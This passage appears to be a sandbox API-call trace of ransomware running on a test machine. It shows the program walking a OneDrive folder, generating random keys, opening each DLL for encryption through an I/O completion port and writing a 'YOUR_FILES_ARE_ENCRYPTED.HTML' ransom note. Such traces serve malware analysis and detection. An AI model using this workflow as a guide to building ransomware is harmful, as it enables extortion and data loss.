[0113.225] wsprintfW (in: param_1=0x19e0d6, param_2="%02X" | out: param_1="E7") returned 2 [0113.225] wsprintfW (in: param_1=0x19e0da, param_2="%02X" | out: param_1="1D") returned 2 [0113.225] wsprintfW (in: param_1=0x19e0de, param_2="%02X" | out: param_1="F1") returned 2 [0113.225] wsprintfW (in: param_1=0x19e0e2, param_2="%02X" | out: param_1="01") returned 2 [0113.225] wsprintfW (in: param_1=0x19e0e6, param_2="%02X" | out: param_1="16") returned 2 [0113.225] wsprintfW (in: param_1=0x19e0ea, param_2="%02X" | out: param_1="32") returned 2 [0113.225] wsprintfW (in: param_1=0x19e0ee, param_2="%02X" | out: param_1="24") returned 2 [0113.225] wsprintfW (in: param_1=0x19e0f2, param_2="%02X" | out: param_1="C5") returned 2 [0113.225] wsprintfW (in: param_1=0x19e0f6, param_2="%02X" | out: param_1="9C") returned 2 [0113.225] wsprintfW (in: param_1=0x19e0fa, param_2="%02X" | out: param_1="3F") returned 2 [0113.225] wsprintfW (in: param_1=0x19e0fe, param_2="%02X" | out: param_1="BA") returned 2 [0113.225] wsprintfW (in: param_1=0x19e102, param_2="%02X" | out: param_1="C8") returned 2 [0113.225] wsprintfW (in: param_1=0x19e106, param_2="%02X" | out: param_1="15") returned 2 [0113.225] wsprintfW (in: param_1=0x19e10a, param_2="%02X" | out: param_1="C5") returned 2 [0113.225] wsprintfW (in: param_1=0x19e10e, param_2="%02X" | out: param_1="23") returned 2 [0113.225] wsprintfW (in: param_1=0x19e112, param_2="%02X" | out: param_1="A5") returned 2 [0113.225] wsprintfW (in: param_1=0x19e116, param_2="%02X" | out: param_1="B8") returned 2 [0113.225] wsprintfW (in: param_1=0x19e11a, param_2="%02X" | out: param_1="B1") returned 2 [0113.225] wsprintfW (in: param_1=0x19e11e, param_2="%02X" | out: param_1="69") returned 2 [0113.225] wsprintfW (in: param_1=0x19e122, param_2="%02X" | out: param_1="EE") returned 2 [0113.225] wsprintfW (in: param_1=0x19e126, param_2="%02X" | out: param_1="0A") returned 2 [0113.226] lstrcpyW (in: lpString1=0x30b00fc, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\SyncEngine.dll" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\SyncEngine.dll") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\SyncEngine.dll" [0113.226] CreateIoCompletionPort (FileHandle=0x324, ExistingCompletionPort=0x274, CompletionKey=0x30a0048, NumberOfConcurrentThreads=0x0) returned 0x274 [0113.226] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x30a0048, lpOverlapped=0x30a0048) returned 1 [0113.226] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x641685fa, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x641685fa, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x64bd6a07, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x494c0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="Telemetry.dll", cAlternateFileName="TELEME~1.DLL")) returned 1 [0113.226] StrStrIW (lpFirst="Telemetry.dll", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.226] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\Telemetry.dll") returned 89 [0113.226] PathFindExtensionW (pszPath="Telemetry.dll") returned=".dll" [0113.226] lstrlenW (lpString=".dll") returned 4 [0113.226] PathFindExtensionW (pszPath="Telemetry.dll") returned=".dll" [0113.226] SystemFunction036 (in: RandomBuffer=0x19e16c, RandomBufferLength=0x20 | out: RandomBuffer=0x19e16c) returned 1 [0113.226] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\Telemetry.dll" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_3\\telemetry.dll"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x330 [0113.227] GetFileSizeEx (in: hFile=0x330, lpFileSize=0x19e190 | out: lpFileSize=0x19e190*=300224) returned 1 [0113.228] GetProcessHeap () returned 0x600000 [0113.228] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x30f2fc0 [0113.234] wsprintfW (in: param_1=0x19e0aa, param_2="%02X" | out: param_1="73") returned 2 [0113.234] wsprintfW (in: param_1=0x19e0ae, param_2="%02X" | out: param_1="F3") returned 2 [0113.234] wsprintfW (in: param_1=0x19e0b2, param_2="%02X" | out: param_1="4C") returned 2 [0113.234] wsprintfW (in: param_1=0x19e0b6, param_2="%02X" | out: param_1="AB") returned 2 [0113.234] wsprintfW (in: param_1=0x19e0ba, param_2="%02X" | out: param_1="94") returned 2 [0113.234] wsprintfW (in: param_1=0x19e0be, param_2="%02X" | out: param_1="2F") returned 2 [0113.234] wsprintfW (in: param_1=0x19e0c2, param_2="%02X" | out: param_1="66") returned 2 [0113.234] wsprintfW (in: param_1=0x19e0c6, param_2="%02X" | out: param_1="13") returned 2 [0113.234] wsprintfW (in: param_1=0x19e0ca, param_2="%02X" | out: param_1="2E") returned 2 [0113.234] wsprintfW (in: param_1=0x19e0ce, param_2="%02X" | out: param_1="9C") returned 2 [0113.234] wsprintfW (in: param_1=0x19e0d2, param_2="%02X" | out: param_1="A0") returned 2 [0113.234] wsprintfW (in: param_1=0x19e0d6, param_2="%02X" | out: param_1="88") returned 2 [0113.234] wsprintfW (in: param_1=0x19e0da, param_2="%02X" | out: param_1="49") returned 2 [0113.234] wsprintfW (in: param_1=0x19e0de, param_2="%02X" | out: param_1="44") returned 2 [0113.234] wsprintfW (in: param_1=0x19e0e2, param_2="%02X" | out: param_1="21") returned 2 [0113.234] wsprintfW (in: param_1=0x19e0e6, param_2="%02X" | out: param_1="07") returned 2 [0113.234] wsprintfW (in: param_1=0x19e0ea, param_2="%02X" | out: param_1="C2") returned 2 [0113.234] wsprintfW (in: param_1=0x19e0ee, param_2="%02X" | out: param_1="6C") returned 2 [0113.234] wsprintfW (in: param_1=0x19e0f2, param_2="%02X" | out: param_1="83") returned 2 [0113.234] wsprintfW (in: param_1=0x19e0f6, param_2="%02X" | out: param_1="56") returned 2 [0113.234] wsprintfW (in: param_1=0x19e0fa, param_2="%02X" | out: param_1="BC") returned 2 [0113.234] wsprintfW (in: param_1=0x19e0fe, param_2="%02X" | out: param_1="02") returned 2 [0113.234] wsprintfW (in: param_1=0x19e102, param_2="%02X" | out: param_1="23") returned 2 [0113.234] wsprintfW (in: param_1=0x19e106, param_2="%02X" | out: param_1="6E") returned 2 [0113.234] wsprintfW (in: param_1=0x19e10a, param_2="%02X" | out: param_1="AB") returned 2 [0113.234] wsprintfW (in: param_1=0x19e10e, param_2="%02X" | out: param_1="33") returned 2 [0113.234] wsprintfW (in: param_1=0x19e112, param_2="%02X" | out: param_1="5D") returned 2 [0113.234] wsprintfW (in: param_1=0x19e116, param_2="%02X" | out: param_1="79") returned 2 [0113.234] wsprintfW (in: param_1=0x19e11a, param_2="%02X" | out: param_1="7B") returned 2 [0113.234] wsprintfW (in: param_1=0x19e11e, param_2="%02X" | out: param_1="C2") returned 2 [0113.234] wsprintfW (in: param_1=0x19e122, param_2="%02X" | out: param_1="9C") returned 2 [0113.235] wsprintfW (in: param_1=0x19e126, param_2="%02X" | out: param_1="15") returned 2 [0113.235] lstrcpyW (in: lpString1=0x3103074, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\Telemetry.dll" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\Telemetry.dll") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\Telemetry.dll" [0113.235] CreateIoCompletionPort (FileHandle=0x330, ExistingCompletionPort=0x274, CompletionKey=0x30f2fc0, NumberOfConcurrentThreads=0x0) returned 0x274 [0113.235] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x30f2fc0, lpOverlapped=0x30f2fc0) returned 1 [0113.235] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x650751e8, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x650751e8, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x6596648d, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x632c0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="VideoStreamingPlugin.dll", cAlternateFileName="VIDEOS~1.DLL")) returned 1 [0113.235] StrStrIW (lpFirst="VideoStreamingPlugin.dll", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.235] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\VideoStreamingPlugin.dll") returned 100 [0113.235] PathFindExtensionW (pszPath="VideoStreamingPlugin.dll") returned=".dll" [0113.236] lstrlenW (lpString=".dll") returned 4 [0113.236] PathFindExtensionW (pszPath="VideoStreamingPlugin.dll") returned=".dll" [0113.236] SystemFunction036 (in: RandomBuffer=0x19e16c, RandomBufferLength=0x20 | out: RandomBuffer=0x19e16c) returned 1 [0113.237] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\VideoStreamingPlugin.dll" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_3\\videostreamingplugin.dll"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x330 [0113.241] GetFileSizeEx (in: hFile=0x330, lpFileSize=0x19e190 | out: lpFileSize=0x19e190*=406208) returned 1 [0113.241] GetProcessHeap () returned 0x600000 [0113.241] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x30f2fc0 [0113.243] wsprintfW (in: param_1=0x19e0aa, param_2="%02X" | out: param_1="90") returned 2 [0113.243] wsprintfW (in: param_1=0x19e0ae, param_2="%02X" | out: param_1="86") returned 2 [0113.243] wsprintfW (in: param_1=0x19e0b2, param_2="%02X" | out: param_1="F9") returned 2 [0113.243] wsprintfW (in: param_1=0x19e0b6, param_2="%02X" | out: param_1="D2") returned 2 [0113.244] wsprintfW (in: param_1=0x19e0ba, param_2="%02X" | out: param_1="B4") returned 2 [0113.244] wsprintfW (in: param_1=0x19e0be, param_2="%02X" | out: param_1="F3") returned 2 [0113.244] wsprintfW (in: param_1=0x19e0c2, param_2="%02X" | out: param_1="3D") returned 2 [0113.244] wsprintfW (in: param_1=0x19e0c6, param_2="%02X" | out: param_1="19") returned 2 [0113.244] wsprintfW (in: param_1=0x19e0ca, param_2="%02X" | out: param_1="A3") returned 2 [0113.244] wsprintfW (in: param_1=0x19e0ce, param_2="%02X" | out: param_1="B6") returned 2 [0113.244] wsprintfW (in: param_1=0x19e0d2, param_2="%02X" | out: param_1="E9") returned 2 [0113.244] wsprintfW (in: param_1=0x19e0d6, param_2="%02X" | out: param_1="85") returned 2 [0113.244] wsprintfW (in: param_1=0x19e0da, param_2="%02X" | out: param_1="9D") returned 2 [0113.244] wsprintfW (in: param_1=0x19e0de, param_2="%02X" | out: param_1="64") returned 2 [0113.244] wsprintfW (in: param_1=0x19e0e2, param_2="%02X" | out: param_1="1B") returned 2 [0113.244] wsprintfW (in: param_1=0x19e0e6, param_2="%02X" | out: param_1="1C") returned 2 [0113.244] wsprintfW (in: param_1=0x19e0ea, param_2="%02X" | out: param_1="04") returned 2 [0113.244] wsprintfW (in: param_1=0x19e0ee, param_2="%02X" | out: param_1="F9") returned 2 [0113.244] wsprintfW (in: param_1=0x19e0f2, param_2="%02X" | out: param_1="4C") returned 2 [0113.244] wsprintfW (in: param_1=0x19e0f6, param_2="%02X" | out: param_1="96") returned 2 [0113.244] wsprintfW (in: param_1=0x19e0fa, param_2="%02X" | out: param_1="44") returned 2 [0113.244] wsprintfW (in: param_1=0x19e0fe, param_2="%02X" | out: param_1="D6") returned 2 [0113.244] wsprintfW (in: param_1=0x19e102, param_2="%02X" | out: param_1="D4") returned 2 [0113.244] wsprintfW (in: param_1=0x19e106, param_2="%02X" | out: param_1="75") returned 2 [0113.244] wsprintfW (in: param_1=0x19e10a, param_2="%02X" | out: param_1="92") returned 2 [0113.244] wsprintfW (in: param_1=0x19e10e, param_2="%02X" | out: param_1="73") returned 2 [0113.244] wsprintfW (in: param_1=0x19e112, param_2="%02X" | out: param_1="88") returned 2 [0113.244] wsprintfW (in: param_1=0x19e116, param_2="%02X" | out: param_1="25") returned 2 [0113.244] wsprintfW (in: param_1=0x19e11a, param_2="%02X" | out: param_1="78") returned 2 [0113.244] wsprintfW (in: param_1=0x19e11e, param_2="%02X" | out: param_1="3F") returned 2 [0113.244] wsprintfW (in: param_1=0x19e122, param_2="%02X" | out: param_1="5D") returned 2 [0113.244] wsprintfW (in: param_1=0x19e126, param_2="%02X" | out: param_1="19") returned 2 [0113.245] lstrcpyW (in: lpString1=0x3103074, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\VideoStreamingPlugin.dll" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\VideoStreamingPlugin.dll") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\VideoStreamingPlugin.dll" [0113.245] CreateIoCompletionPort (FileHandle=0x330, ExistingCompletionPort=0x274, CompletionKey=0x30f2fc0, NumberOfConcurrentThreads=0x0) returned 0x274 [0113.245] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x30f2fc0, lpOverlapped=0x30f2fc0) returned 1 [0113.245] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6675a388, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x6675a388, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x679d4966, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x684c0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="wlmfds.dll", cAlternateFileName="")) returned 1 [0113.245] StrStrIW (lpFirst="wlmfds.dll", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.245] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\wlmfds.dll") returned 86 [0113.245] PathFindExtensionW (pszPath="wlmfds.dll") returned=".dll" [0113.245] lstrlenW (lpString=".dll") returned 4 [0113.245] PathFindExtensionW (pszPath="wlmfds.dll") returned=".dll" [0113.245] SystemFunction036 (in: RandomBuffer=0x19e16c, RandomBufferLength=0x20 | out: RandomBuffer=0x19e16c) returned 1 [0113.246] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\wlmfds.dll" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_3\\wlmfds.dll"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x324 [0113.247] GetFileSizeEx (in: hFile=0x324, lpFileSize=0x19e190 | out: lpFileSize=0x19e190*=427200) returned 1 [0113.247] GetProcessHeap () returned 0x600000 [0113.247] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x30a0048 [0113.253] wsprintfW (in: param_1=0x19e0aa, param_2="%02X" | out: param_1="1C") returned 2 [0113.253] wsprintfW (in: param_1=0x19e0ae, param_2="%02X" | out: param_1="67") returned 2 [0113.253] wsprintfW (in: param_1=0x19e0b2, param_2="%02X" | out: param_1="ED") returned 2 [0113.253] wsprintfW (in: param_1=0x19e0b6, param_2="%02X" | out: param_1="99") returned 2 [0113.253] wsprintfW (in: param_1=0x19e0ba, param_2="%02X" | out: param_1="2C") returned 2 [0113.253] wsprintfW (in: param_1=0x19e0be, param_2="%02X" | out: param_1="DE") returned 2 [0113.253] wsprintfW (in: param_1=0x19e0c2, param_2="%02X" | out: param_1="80") returned 2 [0113.253] wsprintfW (in: param_1=0x19e0c6, param_2="%02X" | out: param_1="7C") returned 2 [0113.253] wsprintfW (in: param_1=0x19e0ca, param_2="%02X" | out: param_1="08") returned 2 [0113.253] wsprintfW (in: param_1=0x19e0ce, param_2="%02X" | out: param_1="B6") returned 2 [0113.253] wsprintfW (in: param_1=0x19e0d2, param_2="%02X" | out: param_1="7C") returned 2 [0113.253] wsprintfW (in: param_1=0x19e0d6, param_2="%02X" | out: param_1="C4") returned 2 [0113.253] wsprintfW (in: param_1=0x19e0da, param_2="%02X" | out: param_1="4F") returned 2 [0113.253] wsprintfW (in: param_1=0x19e0de, param_2="%02X" | out: param_1="FF") returned 2 [0113.253] wsprintfW (in: param_1=0x19e0e2, param_2="%02X" | out: param_1="A3") returned 2 [0113.253] wsprintfW (in: param_1=0x19e0e6, param_2="%02X" | out: param_1="59") returned 2 [0113.253] wsprintfW (in: param_1=0x19e0ea, param_2="%02X" | out: param_1="25") returned 2 [0113.253] wsprintfW (in: param_1=0x19e0ee, param_2="%02X" | out: param_1="07") returned 2 [0113.253] wsprintfW (in: param_1=0x19e0f2, param_2="%02X" | out: param_1="13") returned 2 [0113.253] wsprintfW (in: param_1=0x19e0f6, param_2="%02X" | out: param_1="61") returned 2 [0113.253] wsprintfW (in: param_1=0x19e0fa, param_2="%02X" | out: param_1="03") returned 2 [0113.253] wsprintfW (in: param_1=0x19e0fe, param_2="%02X" | out: param_1="36") returned 2 [0113.253] wsprintfW (in: param_1=0x19e102, param_2="%02X" | out: param_1="FB") returned 2 [0113.253] wsprintfW (in: param_1=0x19e106, param_2="%02X" | out: param_1="70") returned 2 [0113.253] wsprintfW (in: param_1=0x19e10a, param_2="%02X" | out: param_1="42") returned 2 [0113.253] wsprintfW (in: param_1=0x19e10e, param_2="%02X" | out: param_1="27") returned 2 [0113.253] wsprintfW (in: param_1=0x19e112, param_2="%02X" | out: param_1="3E") returned 2 [0113.253] wsprintfW (in: param_1=0x19e116, param_2="%02X" | out: param_1="1E") returned 2 [0113.253] wsprintfW (in: param_1=0x19e11a, param_2="%02X" | out: param_1="CD") returned 2 [0113.253] wsprintfW (in: param_1=0x19e11e, param_2="%02X" | out: param_1="22") returned 2 [0113.254] wsprintfW (in: param_1=0x19e122, param_2="%02X" | out: param_1="99") returned 2 [0113.254] wsprintfW (in: param_1=0x19e126, param_2="%02X" | out: param_1="00") returned 2 [0113.254] lstrcpyW (in: lpString1=0x30b00fc, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\wlmfds.dll" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\wlmfds.dll") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\wlmfds.dll" [0113.254] CreateIoCompletionPort (FileHandle=0x324, ExistingCompletionPort=0x274, CompletionKey=0x30a0048, NumberOfConcurrentThreads=0x0) returned 0x274 [0113.254] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x30a0048, lpOverlapped=0x30a0048) returned 1 [0113.254] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x68062f9d, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x68062f9d, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x68b901fc, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x5d6c0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="WnsClientApi.dll", cAlternateFileName="WNSCLI~1.DLL")) returned 1 [0113.255] StrStrIW (lpFirst="WnsClientApi.dll", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.255] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\WnsClientApi.dll") returned 92 [0113.255] PathFindExtensionW (pszPath="WnsClientApi.dll") returned=".dll" [0113.255] lstrlenW (lpString=".dll") returned 4 [0113.256] PathFindExtensionW (pszPath="WnsClientApi.dll") returned=".dll" [0113.256] SystemFunction036 (in: RandomBuffer=0x19e16c, RandomBufferLength=0x20 | out: RandomBuffer=0x19e16c) returned 1 [0113.256] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\WnsClientApi.dll" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_3\\wnsclientapi.dll"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x330 [0113.257] GetFileSizeEx (in: hFile=0x330, lpFileSize=0x19e190 | out: lpFileSize=0x19e190*=382656) returned 1 [0113.257] GetProcessHeap () returned 0x600000 [0113.257] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x30f2fc0 [0113.259] wsprintfW (in: param_1=0x19e0aa, param_2="%02X" | out: param_1="36") returned 2 [0113.259] wsprintfW (in: param_1=0x19e0ae, param_2="%02X" | out: param_1="AC") returned 2 [0113.259] wsprintfW (in: param_1=0x19e0b2, param_2="%02X" | out: param_1="11") returned 2 [0113.259] wsprintfW (in: param_1=0x19e0b6, param_2="%02X" | out: param_1="F1") returned 2 [0113.259] wsprintfW (in: param_1=0x19e0ba, param_2="%02X" | out: param_1="16") returned 2 [0113.259] wsprintfW (in: param_1=0x19e0be, param_2="%02X" | out: param_1="28") returned 2 [0113.259] wsprintfW (in: param_1=0x19e0c2, param_2="%02X" | out: param_1="2E") returned 2 [0113.259] wsprintfW (in: param_1=0x19e0c6, param_2="%02X" | out: param_1="64") returned 2 [0113.259] wsprintfW (in: param_1=0x19e0ca, param_2="%02X" | out: param_1="01") returned 2 [0113.259] wsprintfW (in: param_1=0x19e0ce, param_2="%02X" | out: param_1="13") returned 2 [0113.259] wsprintfW (in: param_1=0x19e0d2, param_2="%02X" | out: param_1="C8") returned 2 [0113.259] wsprintfW (in: param_1=0x19e0d6, param_2="%02X" | out: param_1="81") returned 2 [0113.259] wsprintfW (in: param_1=0x19e0da, param_2="%02X" | out: param_1="83") returned 2 [0113.259] wsprintfW (in: param_1=0x19e0de, param_2="%02X" | out: param_1="E5") returned 2 [0113.259] wsprintfW (in: param_1=0x19e0e2, param_2="%02X" | out: param_1="EB") returned 2 [0113.259] wsprintfW (in: param_1=0x19e0e6, param_2="%02X" | out: param_1="0A") returned 2 [0113.259] wsprintfW (in: param_1=0x19e0ea, param_2="%02X" | out: param_1="E7") returned 2 [0113.259] wsprintfW (in: param_1=0x19e0ee, param_2="%02X" | out: param_1="85") returned 2 [0113.260] wsprintfW (in: param_1=0x19e0f2, param_2="%02X" | out: param_1="01") returned 2 [0113.260] wsprintfW (in: param_1=0x19e0f6, param_2="%02X" | out: param_1="AD") returned 2 [0113.260] wsprintfW (in: param_1=0x19e0fa, param_2="%02X" | out: param_1="9B") returned 2 [0113.260] wsprintfW (in: param_1=0x19e0fe, param_2="%02X" | out: param_1="A8") returned 2 [0113.260] wsprintfW (in: param_1=0x19e102, param_2="%02X" | out: param_1="EA") returned 2 [0113.260] wsprintfW (in: param_1=0x19e106, param_2="%02X" | out: param_1="35") returned 2 [0113.260] wsprintfW (in: param_1=0x19e10a, param_2="%02X" | out: param_1="BF") returned 2 [0113.260] wsprintfW (in: param_1=0x19e10e, param_2="%02X" | out: param_1="B8") returned 2 [0113.260] wsprintfW (in: param_1=0x19e112, param_2="%02X" | out: param_1="E2") returned 2 [0113.260] wsprintfW (in: param_1=0x19e116, param_2="%02X" | out: param_1="EB") returned 2 [0113.260] wsprintfW (in: param_1=0x19e11a, param_2="%02X" | out: param_1="9C") returned 2 [0113.260] wsprintfW (in: param_1=0x19e11e, param_2="%02X" | out: param_1="2A") returned 2 [0113.260] wsprintfW (in: param_1=0x19e122, param_2="%02X" | out: param_1="08") returned 2 [0113.260] wsprintfW (in: param_1=0x19e126, param_2="%02X" | out: param_1="28") returned 2 [0113.260] lstrcpyW (in: lpString1=0x3103074, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\WnsClientApi.dll" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\WnsClientApi.dll") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\WnsClientApi.dll" [0113.260] CreateIoCompletionPort (FileHandle=0x330, ExistingCompletionPort=0x274, CompletionKey=0x30f2fc0, NumberOfConcurrentThreads=0x0) returned 0x274 [0113.260] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x30f2fc0, lpOverlapped=0x30f2fc0) returned 1 [0113.261] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x68062f9d, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x68062f9d, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x68b901fc, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x5d6c0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="WnsClientApi.dll", cAlternateFileName="WNSCLI~1.DLL")) returned 0 [0113.261] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0113.261] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 105 [0113.261] GetProcessHeap () returned 0x600000 [0113.261] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x315d190 [0113.261] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_3\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c [0113.262] WriteFile (in: hFile=0x31c, lpBuffer=0x315d190*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x315d190*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 